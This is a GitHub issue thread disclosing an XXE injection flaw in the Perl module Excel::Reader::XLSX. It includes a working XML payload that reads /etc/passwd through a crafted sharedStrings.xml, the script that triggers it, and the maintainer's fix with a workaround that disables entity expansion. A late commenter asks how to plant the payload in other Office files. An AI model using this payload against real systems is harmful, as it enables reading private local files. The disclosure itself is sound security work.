XXE injection is possible via specially crafted excel file

[luc-lynx]

The module is vulnerable to XXE injection that allows to read local files, make network requests etc.

How to reproduce the issue:

1. Add XXE payload to xl/sharedStrings.xml like in the attached file

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>

1. Run example from README.md:

use strict;
use warnings;
use Excel::Reader::XLSX;

my $reader = Excel::Reader::XLSX->new();
my $workbook = $reader->read_file( 'test2.xlsx' );

if ( !defined $workbook ) {
    die $reader->error(), "\n";
}

for my $worksheet ( $workbook->worksheets() ) {

    my $sheetname = $worksheet->name();

    print "Sheet = $sheetname\n";

    while ( my $row = $worksheet->next_row() ) {

        while ( my $cell = $row->next_cell() ) {

            my $row   = $cell->row();
            my $col   = $cell->col();
            my $value = $cell->value();

            print "  Cell ($row, $col) = $value\n";
        }
    }
}

As a result you'll see the content of your local /etc/passwd file

test2.xlsx

[jmcnamara]

Hi Evgeny,

Thanks for highlighting that vulnerability.

Just to note that this project was never released to CPAN, hasn't been worked on since April 2012, and is effectively abandoned. There are maintained solutions such as Spreadsheet::ParseXLSX that people should be using instead.

John

[luc-lynx]

Hi John,

Thanks for clarification. I just came across the bug in several projects that were using this module for xlsx processing. Just wanted to leave the report here for those who will possibly use code as a reminder that they will need to fix the issue themselves.

Evgeny

[jmcnamara]

Thanks.

Is there a workaround for this issue?

[luc-lynx]

It should be something like

my $xml_reader = XML::LibXML::Reader->new(
        location  => $filename,
        load_ext_dtd => 0,
        expand_entities => 0,
        no_blanks => 1,
        no_network => 1
    );

during XML parser init. Sure, I can send a PR, but it'll take some time because I'm not a Perl developer at all =)

[jmcnamara]

I've pushed a fix for this to master. If you encounter users with this vulnerability you can ask them to upgrade or better still to use a supported module.

Either way, thank you for the report.

[SaFiSec]

@luc-lynx Where to add this payload in excel files kindly make a video for it. Using Linux LibreOffice. Also Office other files Word,PP, ETC.